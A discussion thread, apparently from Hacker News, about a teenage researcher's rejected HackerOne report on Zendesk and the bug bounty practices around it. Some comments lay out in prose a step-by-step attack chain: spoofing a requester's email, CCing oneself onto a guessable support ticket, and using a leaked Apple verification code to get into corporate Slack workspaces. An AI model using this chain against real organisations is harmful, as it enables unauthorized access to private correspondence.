My only experience with them was when I found a pretty serious security bug and noticed the company in question had a bounty with them. Opened an account on H1, reported the bug, got "not a serious issue", promptly closed the H1 account. If the company is incompetent or relying on an incompetent 3rd party bug bounty service provider, I won't deal with them. I don't need this in my life.
The company did fix the issue a few months later, so there's that.
They all are. Bugcrowd once told me that, "yes, it's not a security issue or even a bug, but we recommend providing small (100€) rewards for non-bugs to keep researchers engaged!"
Everything is bad sounds like a defeatist stance.
Fact is they are better than triaging everything yourself and also better than outright ignoring all vuln reports.
It’s an imperfect system I agree - but it’s the best we have
It's incredibly hard and resource intensive to run a bounty program, so anyone doing it for shortcuts or virtue signaling will quickly realize if they're not mature enough to run one.
“2) seen as a cheaper alternative to someone who knows anything about security - "why hire someone that actually knows anything about security when we can just pay a pittance to strangers and believe every word they say?"”
It doesn’t make sense, companies with less revenue aren’t the ones doing this. It’s usually the richer tech companies.
It is also larger tech companies that have basically infinite attack surface.
So my argument is that it does not matter how much they spend on security they will get hacked anyway, only thing they can do is keep spending in check and limit scope of hacks.
> A $1.3 billion revenue company being too tight to pay this after all, even on their 2nd chance, is so short-sighted it's absurd.
I'll give an "another side" perspective. My company was much smaller. Out of 10+ "I found a vulnerability" emails I got last year, all were something like mass-produced emails generated based on an automated vulnerability scanning tool.
Investigating all of those for "is it really an issue" is more work than it seems. For many companies looking to improve security, there are higher ROI things to do than investigating all of those emails.
https://www.sqlite.org/cves.html provides an interesting perspective. While they thankfully already have a pretty low surface area from overall design/purpose/etc, You can see a decent number of vulns reported that are either 'not their fault' (i.e. wrappers/consumers) or are close enough to the other side of the airtight hatchway (oh, you had access to the database file to modify it in a malicious way, and modified it in a malicious way)[0]
We also had this problem in my previous company a few years ago, a 20-people company, but somehow we attracted much more attention.
In one specific instance, we had 20 emails in a single month about a specific Wordpress PHP endpoint that had a vulnerability, in a separate market site in another domain. The thing is, it had already been replaced by our Wordpress contractor as part of the default install, but it was returning 200.
But being a static page didn't stop the people running scanners from asking us from money even after they were informed of the above.
We have a policy to never acknowledge unsolicited emails like that unless they follow the simple instructions set-out in our /.well-known/security.txt file (see https://en.wikipedia.org/wiki/Security.txt) - honestly all they have to do is put “I put a banana in my fridge” as the message subject (or use PGP/GPG/SMIME) and it’ll be instantly prioritised.
The logic being that any actual security-researcher with even minimal levels of competency will know to check the security.txt file and can follow basic instructions; while if any of our actual (paying) users find a security issue then they’ll go through our internal ticket site and not public e-mail anyway - so all that’s left are low-effort vuln-scanner reports - and it’s always the same non-issues like clickjacking (but only when using IE9 for some reason, even though it’s 2024 now…) or people who think their browser’s Web Inspector is a “hacking tool” that allows anyone to edit any data in our system…
And FWIW, I’ve never received a genuine security issue report with an admission of kitchen refrigeration of fruit in the 18 months we’ve had a security.txt file - it’s almost as-if qualified competent professionals don’t operate like an embarrassingly pathetic shakedown.
I saw a great presentation from Finn.no on their bug bounty program. They had had great success, despite the amount of work it took. Much more so than the three different security companies they hired each year to find vulnerabilities.
They also had a security.txt file and had received several emails through that, but all of it was spam. Ironically they had received more real security vulnerabilities through people contacting them on LinkedIn than through their security.txt file.
Your milage may vary, but it didn’t seem like the security.txt file was read by the people one would hope would read it.
I understand, this is exactly why I noted "even on their 2nd chance". The initial lack of payout/meaningful response was incompetency by not understanding the severity of the vuln. Fine, happens.
But after the PoC that showed the severity in a way that anyone could understand, they still didn't pay. That's the issue. The whole investigation was done for them.
I previously worked for a mortgage software startup that attracted interest from big banks.
To ease concerns about our scalability and longevity, we move from a tiny office to an office with a lot of empty space.
This strategic move supposes signaled to prospective corporate clients that we were committed to sustaining our solution over the long term, rather than just a few years but in the end the company went out of business. so much for that.
Yet the same corporate will eat anything that Google or MSFT does while we all know they kill projects just like anyone else or like any smaller company going out.
I am actually seriously interested in what people there do day to day. I’m wondering this about a lot of very large companies, I would definitely watch a documentary about that.
Hour-long meetings about whether the copy should read "data center," "datacenter," "data-center," or whether it is really even correct to say any of these at all. And then negotiating with the design folks to fit in the extra character. Only to throw it all away because nobody thought about the fact that it has to support 5 different languages.
I wish I was kidding. Used to work at a place that did crap like that, pulling in developers for these time sucks because "only they really know the correct technical usage for our industry."
It's not weird to pick one and keep a consistent style, for example by looking at Google or at Wikipedia or some other source if the dictionary lists both or neither, but to have meetings about it?!
I work at similar size company. Basically they are like most companies building out the next 5 years while also keeping the lights on at four nines. There can be a lot of depth to product that you dont see. Anyone who says "why you need X people" often havn't tried a side hussle where you see 360 all the activities involved.
Building at scale without racking up big bill and hitting SLAs require a decent amount of effort.
At some point, most of your engineering time is spent on trying to understand what the previous team did. There's probably some engineer at Zendesk banging his head on the table because his boss wouldn't let him fix the sequential ticket IDs when he found them two months ago.
I work in one of the biggest companies of the world (employee and revenue wise) and it's basically a run-off reaction of well-articulated desk employees jerking each other off that, telling each other that they are so very important.
And the common management approach to anything not working immediately is "throw another 1.000 employees into the project" and the middle-managers measure their success by how many employees they are managing so it's a train without breaks. Hope it goes bankrupt soon.
Big companies are places where you get kudos for only taking two weeks to solve a problem you’ve solved elsewhere in two days. To an extent it’s Little’s Law. The latency requires more “CPUs” to handle the traffic.
This is super loud to me RN because some of these "big" companies are case studies in Mythical Man Month's "N channels of communication" as well as weird flashbacks to discussions on costs context switching and schedulers in various CS courses.
Every single click in ServiceNow takes a full 2 seconds to do anything. For a ticketing system. Insane.
What’s more insane is that it is still better than the vast majority of ticketing software. I don’t know what it is about ticketing and Helpdesk that it ALwAYs ends up like that.
> I don’t know what it is about ticketing and Helpdesk that it ALwAYs ends up like that.
The curse of B2B software is that every new big customer wants some custom feature or configuration that is the "deal breaker" for their multi-million dollar contract signing. And everyone except engineering is eager to give it to them because it's not their problem once the ink is dry. Support and renewals are the next guy's problem.
What's interesting is that Frank Slootman touts this transformation as a huge success in his book and talks at length about his conflict with Fred Luddy (who originally authored the simple ticketing incarnation of the ServiceNow monsterblob). The focus on keeping things simple is highlighted as an example of nerds' nearsighted thinking.
I'm sure it's a huge success for the few earning the profits from ServiceNow.
Like any SaaS, the more feature boxes you check, the more potential customers you can "satisfy". And the worse the UX gets for the average user (which then gets driven to purchasing more support).
Great for business (the few), terrible for users (the many). No contradiction there.
Never said that, but a competent engineer should be able to build like 75% of the main functionality of Zendesk over a weekend.
Now, I understand there's probably a lot more to it which is why I would expect it to be a company of around 50 engineers and 150 business/marketing/etc and that's being generous.
The hill I'd die on is that, with money not being a scarce resource and a technically feasible challenge present, a team of 200 should be able to build and sustain almost anything in the world. And that's being even generous. I think realistically a team of 50 should be able to build almost anything
That’s a very HN take but the reality is that the tech is usually never the hard part. Selling, supporting, legal, all the certifications and enterprise contracts you have to do for a product like that are the hard part.
Software developers being surprised that software companies need to do a lot more than just write code is kind of like sailors being surprised that global logistics involves a lot more than handling a ship.
Never said that, but a competent engineer should be able to build like 75% of the main functionality of Zendesk over a weekend.
Now, I understand there's probably a lot more to it which is why I would expect it to be a company of around 50 engineers and 150 business/marketing/etc and that's being generous.
The hill I'd die on is that, with money not being a scarce resource and a technically feasible challenge present, a team of 200 should be able to build and sustain almost anything in the world. And that's being even generous. I think realistically a team of 50 should be able to build almost anything
Bug bounty people do this all the time. It's almost always a sign that your bug is something silly, like DKIM.
Later
I wrote this comment before rereading the original post and realizing that they had literally submitted a DKIM report (albeit a rare instance of a meaningful one). Just to be clear: in my original comment, I did not mean to suggest this bug was silly; only that in the world of security bug bounties, DKIM reports are universally viewed as silly.
Wait... it looks like Zendesk only fixed the issue of Apple account verification emails being added to tickets, not actually the underlying issue?
>In addition to this, we also implemented filters to automatically suspend the following classes of emails: User verification emails sent by Apple based on the Reply-To and Message-Id header values Non-transactional emails from from [email protected] Over the coming months, we will continue to look into opportunities to strengthen our Sender Authentication functionality and provide customers with more gradual and advanced security controls over the types of emails that get suspended or rejected.
So is it still possible to hijack anyone's support tickets using the default configuration of Zendesk if you just happen to know their email and ticket ID?
Yeah. Zendesk only put a bandaid in place to prevent this particular attack vector for the Slack infiltration attack, and did nothing for the initially reported issue.
Zendesk could refuse to allow "ticket collaboration" if customers had a missing or insufficiently secure SPF/DMARC configuration, or at least make customers check a box that says "Tickets may leak their contents to anyone who can send emails".
The piece the author is missing, and why zendesk likely ignored this is impact, and it's something I continually see submissions lacking. As a researcher, if you can't demonstrate impact of your vulnerability, then it looks like just another bug. A public program like zendesk is going to be swamped with reports, and they're using hackerone triagers to augment that volume. The triage system reads through a lot of reports - without clear impact, lots of vulnerabilities look like "just another bug". Notice that Zendesk took notice once mondev was able to escalate to an ATO[1]. That's impact, and that gets noticed!
Yes. But respectfully (residual frustration at zendesk might make me curt here) if their security triage team can't see how dangerous it is for an attacker to get access to an arbitrary thread on a their CLIENT's corporate email chains (in this world of email logins and SSO), then they have a big lapse in security culture, no?
Yes, the researcher could have tee'd himself up better, but this says way more about zendesk than it does about the 15-year-old researcher.
Unauthorized read access to private emails you were never legitimately CCed on already is impact. It should not be necessary to come up with a further exploit daisy chained on top of that in order to be taken seriously. (Otherwise why stop at Slack access? Why is that automatically "impact" if email access isn't?)
The researcher showed how they could hop onto any Zendesk support ticket thread with zero authentication, so that should have been enough given Zendesk was exposing customer data via that attack path.
Clearly Zendesk needs to change things so that the email address that is created for a ticket isn’t guessable.
Exploit or no, the bug and potential impact are the same. I personally find it a waste of time to sink evenings into an exploit when they're going to fix the bug anyway if I simply tell them about the problem. They also know the system better than I do and can probably find a bigger impact anyway
Of course, this is only a good strategy if you're just wanting to do a good deed and not counting on getting more than a thank you note, but Zendesk or Hackerone (whoever you want to blame here) didn't even accept the bug in the first place. That's the problem here, not the omission of an exploit chain
The dude demonstrated the ability to infiltrate a client’s Slack instance via their vulnerability. If that’s not enough to make the hairs on your neck stand on end as an engineer, go fucking do something else.
I don't think it is. Getting arbitrary access to corporate support ticket chains seems pretty high impact to me? Isn't that a gigantic data breach (also probably a GDPR breach) already, before you get to the Slack takeover?
The audience of a security contact point (be that Hackerone or security@') is a technical person
We add impact demonstrations to a few findings per pentest report because our audience is broader: the nontechnical people who decide to allocate the money need to understand why this is useful and that the devs/sysadmins need to get enough time to do things right (developers and sysadmins are often sufficiently skilled, but are under delivery pressure). A sufficiently technical team, when the bug is adequately explained, doesn't need a functional exploit to see it's real/impactful or not
The worse part:"We kindly request you keep this report between you and Zendesk". After being notified of a problem on their side, them ignoring it, now they want to keep things hush hush? That's exactly what the author did in the first place, but they chose to brush it aside. That itself is highly unprofessional. With such an attitude, I'm not surprised that they did not pay out the bounty.
The correct procedure when they fuck up and close the report is to ask the report to be made public. Had he done this, this would have been a non issue.
The reason people don't do this is because they think they have something that can be modified into another bug. Which is exactly what happened here.
You can't ask for money in exchange for not revealing a bug. That's blackmail which is illegal and ethically dubious.
White hat hackers do not require companies to pay them in exchange for not revealing a bug---the reveal of a bug only happens if a company doesn't fix that bug. Companies can be jerks and refuse to pay anything. That doesn't give you the right to blackmail them---you and other security researchers can just refuse to help them in the future.
A refusal to fix the vulnerability is what happened in the original blogpost, so it was fair game for release since the company doesn't care.
Hackers that don't care about ethics or legality won't bother blackmailing companies with vulnerabilities. They'll sell or use the vulnerability to steal more important data, and blackmail companies for millions of dollars in crypto.
I don't think this is true. I'm not a lawyer and this is not legal advice, but I think it's hard to fit the elements of an extortion statute to a "threat" to disclose the results of technical research work you yourself did. Moreover, if a vendor is working with HackerOne, they've already implicitly consented to their norm of non-disclosure in exchange for payment. Further, in something like 15 years of bounty programs, I haven't heard of any cases like this having been filed --- and bounty researchers threaten to publish all the time.
I also disagree that there's anything ethically dubious about it.
Depends on country as well. There was recently a case in Finland where a couple of people found issue in certain locks made by Abloy. They were offering to sell the details to Abloy and suggested that they could alternatively publish them in Youtube. They were found guilty for extreme blackmail (I'm not sure if extreme is the proper term in English, essentially just more extreme form due to e.g. demanding a lot of money). They are planning to appeal it so there is chance it will get overturned.
To correct you, the revealing of a past bug happens almost all the time when a company does fix the bug- that’s what lets researchers publish their findings and show the work they do publicly, and usually gives the company some positive PR for showing their willingness and responsiveness to fix issues. See the CVE program.
Gotcha. The moment you attach a monetary condition it can be seen as extortion. In that case I believe the only responsible thing to do is disclose using customary, reasonable waiting periods.
Doubtful. It's probably just incompetence, rather than malice.
The incident almost certainly cost Zendesk more in (according to the gist) lost contracts and reputational damage than it would've cost to pay the security researcher a bounty.
Risk of bad rep when the researcher reports to HN or makes some noise. Then future security researchers don’t try find issues on your platform, and it’s more insecure as a result.
For a sensible large company, it’s not worth being stingy over (relative) pennies. They waste money like it’s water. They might as well spend where it matters. Bug bounties won’t even show on their bottom line, but cleanup for an exploited issue will.
Aaaaaahhh I am on a rollercoaster of customer experience. I am beyond annoyed at Zendesk for stiffing this kid, but actually kinda charmed by this quirky marketing gimmick.
But also, SECURITY culture concerns beat culture culture. Companies should def consider ditching them for this lapse and their poor form in making it right.
If Zendesk is smart, they should hop on this thread and pay this kid out while everyone is still paying attention in one place, rather than later, when everyone is quietly making business decisions in a thousand little alcoves of the internet.
Otherwise, this is the best thing to happen to the Zendesk Alternatives in a long time
>but actually kinda charmed by this quirky marketing gimmick.
I'm actually pretty annoyed at the stupidity, it's the kind of thing that even a shitty search engine won't be fooled by and hey when I search for Zendesk alternatives I don't see any brand called Zendesk alternative in first few results.
I mean it's like they're too stupid to do what every other weaselly scumbag does, get some fake reviews up comparing your brand to alternatives with the reviews carefully weighted so your target customer base will be uh, I guess Zendesk is really what we want then.
Or at least buy an ad words for the search - with the words Zendesk - There is No Alternative showing up before all the alternatives.
It's ok Zendesk if you use my clever slogan because you can't think of one on your own - I'm not expecting you to pay me for it.
OK google for me doesn't show it, as mentioned, problem with Google is it is difficult to see how your profile is skewing the algorithm, although I also suppose our talking about it here is page ranking it higher.
I think that's pretty funny and not particularly malevolent. It's a fake alt rock band called Zendesk. It's obviously tongue-in-cheek and not going to deceive anyone.
Also, anytime I search for "X alternative" the results are all AI-generated garbage anyway, so I'd welcome something quirky and original like this in my results.
It seems like you're being sarcastic, but I think that's really what happened. I think it's much more about getting press for doing something funny than it is about having a meaningful impact on cluttering search results.
It's the same reason why Google paid its marketing team to make a promo for Gmail Blue (back in 2013 when Google was still doing legitimately funny fake promos):
Also noted that the song (or "lyrics" at least) has "Open Source" in its title so they can position for the "Zendesk Open Source Alternative" long tail.
> While not illegal, it shows the way they think, a sort of manipulative pettiness
Search engine chaff has been in the toolbag of "reputation management" PR firms for a while. Boris Johnson (former UK PM) deployed it many years ago to drown out a viral picture of him in front of a red bus bearing an ad he no longer wanted to associated with, so he was coached to tell an interviewer he has a hobby of painting model buses red.
They need to get the band back together! Release a new album, and go on a world wide reunion tour. And in 2026 they’ve got to release a Best of Zendesk Alternative remastered album.
And in 2027, Zendesk finds that the strategy worked. A little too well! Now the top search result for Zendesk is the rock band, and if you ask an AI about Zendesk, the AI starts yappin about a rock band too! Hahaha
> they have toured the world, headlining major festivals and sharing the stage with legendary acts like Sweater Head, DynoPlax, and The Banana Nuts. Now, Zendesk Alternative has begun a new chapter in their storied career. They have joined forces with Zendesk® to record an anthemic concept album of epic proportions. On the surface, it's a collection of songs about customer service. Underneath, it's about so much more. Finally, Zendesk Alternative and Zendesk® the customer service software company are together at last.
that is hilarious, but also the most non punk rock thing I've ever read. if Apple did it, every one here would be fawning over how genius of a move it were
I have a similar conspiracy theory for DDG, the rapper. I used to go to DuckDuckGo by typing "ddg" in Google. Now, it's all mentions to DDG the rapper.
This was a great writeup, really clear and engagingly written, about an interesting and subtle bug. If the author hadn't mentioned they were 15 I would have assumed it was from a seasoned security professional.
To Daniel/hackermondev: whatever you're doing, keep it up!
Agreed, if I was hiring and the author applied, I would base most of my decision on the quality of this article alone. Just goes to show how engaging communication beats whiteboard interviews, at least for me.
Slack seems to be getting off too easy here. The security—as implemented by Fortune 500 customers??—of an org-wide security domain (i.e. what everyone in an org can see) depends on whether any of the supported OAuth providers can be tricked into provisioning an account with @targetorg.com?
This architecture makes 0 sense to me. Even if an org has totally outsourced its identity and auth management to Google (is this possible?), presumably that would include controls over how new @targetorg.com identities are created on the Google end.
No F500 companies are using Apple as an identity provider since they definitely don't sell such services. So why would an F500 company configure Slack to allow Apple OAuth & introduce this vulnerability?
If you're using Google for identity and authentication, you can definitely control who has an active account in your domain. There can be some lag time before disabling or removing someone truly disables all their downstream accesses, but that's largely outside Google's control. The only way to trick your way into getting a corporate domain email address is to socially engineer a domain admin.
Tangentially, this does raise one of my big issues with using OAuth2 for single-sign-on though, which is that it really doesn't address the third-party authorization problem well. Ok, you're [email protected], Google has verified that, and example.com is our domain, so we're letting you into our app Foobar. Now what? The scopes you requested were for Google APIs only and have nothing to do with Foobar really. So now we need to implement an authorization system in Foobar that decides what [email protected] can actually do. This part, and how to do it right, gets glossed over (at best!) by discussions on OAuth2. It also gets glossed over by product and security when they want things "SSO-enabled", which means development time doesn't get budgeted for it. Even just using groups to control coarse access levels requires integration with provider-specific APIs. OAuth2 is great for identity and authentication, but far too little attention has been paid to doing authorization right.
This comment makes the most sense to me in this thread.
Further, IMO, sure it's a bug that one can say they control [email protected]. But IMO the real issue is lousy, permissive authorisation that gives access to anything simply by virtue of controlling a @company.com mail. Surely some HR/tech person, when an employee is being onboarded, should be enabling access to some core systems (probably by adding them to a group), and the default state for an account with no groups should be no access.
In any large enough organisation, IME there's a lot of ways to get a @org.com email, and too many people/systems have the ability to create an email than a single centralised IT team.
You can also create a non-email Google account as [email protected], as long as you can get email sent to [email protected] (ie, while you are employed by Example, Inc). Then, you leave your job, but still have a google account associated with an example.com email. Depending on how the app checks the login response, they might mistakenly assume you are part of the example.com org.
I'm pretty sure you cannot create a personal account for "[email protected]", as Google both knows about plus-suffixes (didn't they create them?) and any domains already managed under Workspaces. They also, in my experience, seem to have some understanding of domains managed by Microsoft's cloud and perhaps other competitors as well.
But even so, there's another mechanism, which is that when you create an OAuth2-enabled project in Google's console, you can specify that only known users in your domain are allowed to authenticate through it. This would lock out any personal account anyway.
I'm pretty sure you can configure your corporate Slack to only allow authentication providers you choose. So if you have a corporate SSO you can just allow that.
I'm not sure (maybe it's the case only with email auth, not oauth). But there's a setting on slack to not automatically allow people with your company email address. So the tools are there to stop the attack
In case it's not clear these are the two separate vulnerabilities:
1. Zendesk allows you to add a CC to any existing support ticket by sending a (spoofed) reply from the original requestor's email address to that ticket's Reply-To address and including a CC in the email.
In some circumstances the Reply-To address is based on an auto-incrementing integer so it can be guessed. (Although this may not alway be the case: my email archives show some emails from Zendesk using the integer and other emails using a random alphanumeric string. It seems to vary by company so it might be some sort of configuration setting?)
2. Slack allows third-party domain-wide logins via Sign in with Apple without additional verification that the email belongs to a real person. Here the author of the article pretends to be [email protected] to Slack and Slack lets them into the company.com channel, despite the fact that [email protected] does not actually represent a real user and is only intended to be a receiving email address that forwards into Zendesk. (This sounds more like a configuration problem than anything else though.)
Sign In with Apple is allowing you to "create an account"(author's words) on @company.com, which should not be supported in the firat place. Instead, it should rely in a central directory controlled by company.com for authentication
This is clever hack and a reminder of how a chain of smaller security issues (guessable ticket IDs, email spoofing, automatically adding emails to tickets, etc.) can lead to larger ones.
Zendesk deserve a lot of flack here, especially after they already realized this is real. However, just to empathize a bit: the amount of spam SPF, DKIM, DMARC "security" reports anyone running a service gets is absolutely insane. So it's very easy to accidentally misclassify what this reporter originally discovered as that by accident.
Years ago I had a similar train of thought: Zendesk is used by a ton of companies for their support site, and back then HTTPOnly cookies and javascript site isolation were much less of a thing. I found an XSS bug on Zendesk, which also translates into XSS on any site that used it as `support.fortune500.com` subdomain (which was a lot). You could then use it to exploit the main site, either by leaking user cookies or reading CSRF tokens from page contents because it was a subdomain.
Zendesk gave me a tshirt but not any money for it. C'est la vie.
From what I can tell, the vulnerability wasn't even fixed: they just.. changed their spam filter? Whatever that means.
So for this to work still, you need to bypass a spam filter.
They should just force DMARC and SPF like Google has done, and say "your fault if you misconfigure". Also default-off for the CC thing would be a good idea, too, with a warning of what could happen if they turn it on. Alternatively making a non-guessable id for the email.
Hey, now you have to bypass two spam filters, and also email verification from Apple is now marked as likely-spam. Which addresses the very specific Slack infiltration attack, but doesn't address the underlying issue.
Requiring their customers to implement SPF and DMARC as a hard technical requirement is probably bad for business. And as mentioned in TFA, they do note issues regarding SPF/DMARC in their policy.
I think in this case it's the customers of their customers, e.g. people sending emails to [email protected]. In that light requiring all emails coming into [email protected] to have SPF and DMARC is bad for business indeed, not only for Zendesk but probably also for the fictional ACME corp.
EDIT: they absolutley should not use an autoincrementing int as a "support-chain token" though, that's a workaround they could easily do.
> EDIT: they absolutley should not use an autoincrementing int as a "support-chain token" though, that's a workaround they could easily do.
I checked my email archives and some (but not all) of the emails I've received from Zendesk have arbitrary alphanumeric ids in the Reply-To header instead of integers. Seems to depend on the company, perhaps this is a configuration issue?
I’m not clear on that. If the support requestor doesn’t need to be from the company, then I don’t understand why the email sender has to be spoofed in the first place.
The attack requires getting yourself CC’d on a support ticket. In this case to show how bad that is, it was a support ticket that had an oauth ticket to log into slack as “[email protected]”.
From the description, sending an email to [email protected] creates a support ticket, to which you can later latch on by adding a Cc. My understandig is that, at least in order to get the full history of a ticket, including any other emails sent to [email protected], the primary sender needs to be from the company as well. Otherwise, why would you need the Cc hack?
2. The attacker then sends an email to [email protected] from [email protected] (spoofed), attaching their own email address in the CC field.
3. Since the attacker is now CC'ed they can read the entire history of the ticket including the legitimate email Apple sent in (1) containing the verification code.
4. Now that the attacker has verified ownership of the Apple ID with the email address [email protected] they can use that Apple ID to login to any service that grants domain-based access via Sign in With Apple, such as Slack.
My understanding is that, the original sender (spoofed apple in this case) can send the reply to support-$ticket-$id@ with CC field to grant full access to the thread for CC'ed email.
> We also want to address the Bug Bounty program associated with this case. Although the researcher did initially submit the vulnerability through our established process, they violated key ethical principles by directly contacting third parties about their report prior to remediation.
What was the planned response for addressing the vulnerability reported through the Bug Bounty program, and how did the plan change after the researcher escalated the issue directly to Zendesk before remediation was completed?
> ...they violated key ethical principles by directly contacting third parties about their report prior to remediation
According to the researcher, they only contacted 3rd parties after Zendesk rejected the disclosure as out of scope, as they are free to do.
If this timeline is incorrect, Zendesk should immediately correct the record. As it stands, accusing the researcher of violating ethical principles looks very bad for Zendesk. Perhaps even libelous.
That it affected Slack was a side-effect of the original bug, and not a new, previously undisclosed bug. Zendesk fixed the original bug, after rejecting the disclosure. Given all that, Zendesk is still ethically bound to honor the bounty, 3rd party disclosures notwithstanding.
Extremely poor response. You can't blame him for contacting others affected when you marked it as out of scope. And yet you fail to mention that in your blog post..
1. "While this specific issue has been resolved", that was a bug, not an issue.
2. "they violated key ethical principles by directly contacting third parties about their report prior to remediation", what is a violation of ethical principles is to know about a security failure in your application and ignore it, leaving customers at risk, can't wait for some law to pass so people who behave like that face consequences.
3. "We have no evidence that this vulnerability was exploited by a bad actor.", tldr, it don't fixed it until some vendor dropped us, because before that happened, it was cheaper to ignore it.
This is blatant dishonesty- the post documented in detail that the reward had already been denied, and the issue ignored multiple times before they contacted 3rd parties. That is not an ethical violation but an ethical necessity- after ZenDesk refused to act, they had an ethical responsibility to inform everyone affected.
This alone is a huge red flag that ZenDesk isn't a trustworthy organization, on top of trying to hide rather than correct security issues unless they get bad press.
If I were ZenDesk, I would pay out the bounty to this kid immediately, and release a detailed public apology explaining how the entire bounty review system has been revamped to take things like this much more seriously in the future.
"Unrelated" doesn't sound right. Zendesk refused to pay for the vulnerability, so the researcher used it against downstream customers of Zendesk, who did pay the researcher for the impact of that Zendesk vulnerability against their own company.
The dumb thing is that this "out of scope" thing is 100% a Hacker One failure, and exactly the kind of thing I've grown to expect from these triage teams.
"SPF, DKIM, and DMARC issues" is absolutely and positively intended to mean "we don't care if we are missing these headers on our domains", in part because this is 99.9% of drive-by beg bounties (if you are tired of getting "I HAVE FOUND A SERIOUS SECURITY ISSUE IN YOUR WEBSITE" cc'ing security@, legal@, privacy@, and your CEO on a monthly cadence, just set up a DKIM record :P)
Yes, this is technically a bug which is in the space of SPF, DKIM, and/or DMARC. But this is absolutely NOT WHAT THE EXCLUSION IS FOR. Hacker One triage teams should know better, and it's frankly embarrassing that they don't. And it's frankly mortifying that their mediation team also didn't pick up on this.
But it checks out.
This is one of the reasons I will not use Hacker One ever. Bugcrowd is slightly better. Intigriti has (so far) been pretty good. I'm not affiliated with any of them, just have been a customer of all three.
I've seen this go from -2 points to 2 points, now back to 1. Interesting how people are so divided on this when people I've brought up this topic to all agree that good people often get taken advantage off especially in cases like this.
Same experience where I reported a bug, the company ghosted me, and H1 did not even allow disclosure through their platform.
I generally refuse to go through platforms now (also because I really hate being subject to the psychological pressure of a "social credit system", even though I understand why the platforms do it), so if your company doesn't have an alternative reporting form, or refuses bug bounty payouts when a valid issue was reported directly through them instead of through a platform (hello, Backblaze!), I'm not doing free labor for you and you will likely hear about the bug when either someone else finds it or I include it in a public write-up (if it's a bug affecting multiple companies).
I wonder what would happen if researchers en masse were to boycott a particular platform? Disclose to the companies directly and explain they won't work with X and why. Treat any attempt by the company to kick the disclosure back to platform X as a non-response.
In my experience, telling people you've found a vulnerability in their system is met with denial or lack of care, and when you demonstrate the exploit for them to take it seriously, they sue you.
1. zendesk allows you to add users to a support issue and view the complete issue history by sending a response email to a guessable support email from a person associated with an
issue and cc'ing the person to add.
2. Zen desk depends on a spam check for inbound email validity. This check does not appear to catch instances where sender email is spoofed. Zendesk claims this is bdue to DKIM/SPF/DMARC config but I have trouble imagining that 50% of Fortune 500 would get this wrong. There are many automated checks available.
3) Apple issues an Apple ID account to anyone who can receive a verification email
Sent to the mailing address ([email protected])
4) Slack allows you to sign in to a workspace using any Apple ID associated with the workspace domain (e.g. [email protected])
This researcher reported #2 to hackerone and was declined. Researcher later discovered full exploit with
3 and 4. Did not update hackerone, contacted affected companies directly.
it would have been prudent to update hackerone on the additional finding, but it feels like an easy oversight for a 15 year old after getting rejected on the first round.
Zendesk should take the higher ground and recognize the mistake and correct it. Not get all "ethical mumbo jumbo."
If you want to understand the dynamics of what happened here, a very important detail is that the bounty hunter's report implicated DKIM and SPF, and no bug bounty program in the world takes DKIM reports seriously. DKIM is the archetypical beg bounty. You could find DKIM RCE and HackerOne would still round file your report.
> Personally, I’ve always found it surprising that these massive companies, worth billions, rely on third-party tools like Zendesk instead of building their own in-house ticketing systems.
Do you find it surprising that they use Microsoft Office too? Paying someone else to handle things like this is cheaper than paying developers and hosting a service like this.
We don't know if it hasn't to be honest. State actors and exploit sellers could have known about this bug for years and exploited it before it was found by this white hat
A more sensible thing that should've been done is to tokenize the case ID so that you can't just guess it with a numerical range. Also important that you don't leak your key business metrics (# of support cases over time).
I mean, this existed long before acquisition. Maybe the response could have been different in the past, but there is nothing to indicate that would be true.
> Personally, I’ve always found it surprising that these massive companies, worth billions, rely on third-party tools like Zendesk instead of building their own in-house ticketing systems.
For some reason this like cracked me up. Sounds exactly like something 15 year old me might say :-).
Let’s build our own ticketing system! How hard could it be?
Zendesk handles customer data and says its a great customer support platform.
The irony is that they have the worst support and one of the worst response times to issues reported. You will find many experiences on LinkedIn reporting this.
This matches my experience with Zendesk. We did an integration at my previous company and they were incredibly naive with respect to email setup. We had quite strict requirements around deliverability in particular, and having the Zendesk setup play nicely with our email domain setup that was tuned for deliverability. Sadly Zendesk were unable to engage with the issue beyond "just forward emails from your gmail support inbox" which was a long way behind where we were.
For a company built on email, they're not good at it.
I swear I’ve seen this vuln years ago. I thought it was already well known that attacker controlled input for email-bridged ticketing systems means attackers can access at least one @company.com email.
I thought this was mainly mitigated by invalidating the assumption that “only authorized employees can control a company email” – it used to be common 5-10 years ago to verify “that you’re an employee” that way, but I just assumed that kind of stopped in favor of whatever SSO/SAML stuff that became popular with enterprise.
You are a sucker if you are using a platform like HackerOne. I reported a bug (Crypto Exchange, Bitmex) 5 years ago. It was not a critical bug, but still. The team kept the bug report open for 5 years; I assume so that it doesn't affect their payout score. They recognized the bug. After 5 years they closed it. Zero communication.
If you value your time and your health, don't use these platforms. If platforms want security, they can hire people by the hour/day and pay them the relevant wages.
It should be a standard to make bugs public or disclosed to the affected companies atleast a while after it's discovery so at least the companies which are connected to each other can implement their own fix,other wise having closed deals with security researchers behind doors and asking them not to reveal the truth, isn't going to prevent bad actors from using the vulnerability. It is times like these we should reconsider our standard in terms of web security as a whole.
While obviously Zendesk leaving such a huge hole was the main reason for this exploit (you should obviously fail closed when email signals suggest it’s an unauthenticated address), a contributing factor is that Apple forced themselves to be added as an SSO provider.
So the hacks put in place to deal with Google SSO hadn’t been put in place for Apple’s.
Also, what Fortune 500 company is leaving slack’s email based login feature enabled? Why wouldn’t they all be using a corporate SSO solution tied to their company’s slack directory?
How's that "please keep this between us" request working out for them?
Also I think this is a good reminder that using sequential IDs for anything public facing is almost always a bad idea (or at the very least something you should think very hard about). It would be pretty easy to make ticket ID, for example, a sequential 5 digit number followed by 4 random alphanumeric characters. Everyone could still easily refer to the ticket number, but it wouldn't be guessable.
Based on experience of my friend I am inclined to believe that Zendesk is full of shit. She's had bad experience with their Polish site which she described as cultish employer.
This vulnerability in ZD appears to be made worse by ZD's Suspended/Spam feature. There is no indication in the spam queue that there is someone CC'd on the email. So an agent may see a ticket from their customer and approve it. Even when you then view the ticket, there is still no indication there is a CC'd third party unless you 'View original' on the email.
Wait. Did zendesk actually fix the issue, or did they just blacklist a few senders and decide to continue to rely on third party spam filters to save them?
I heard that Zendesk Security team force your _root_ domain to allow their SSL certificates to be issued, per CAA dna record.
I.e. you have domain support.example.com, CNAMEd to Zendesk, so you cannot add any other DNS record to it, but Zendesk should do it on their side. But they refuse, and force you to put CAA to your root domain example.com.
The amount of software that could have been some spreadsheets and an email chain and companies pay enormous amounts of money for and create glaring vulnerabilities in their systems is a big reason why I'll never understand or thrive in a corporate setting.
Wait - how is that workflow possible and supported?
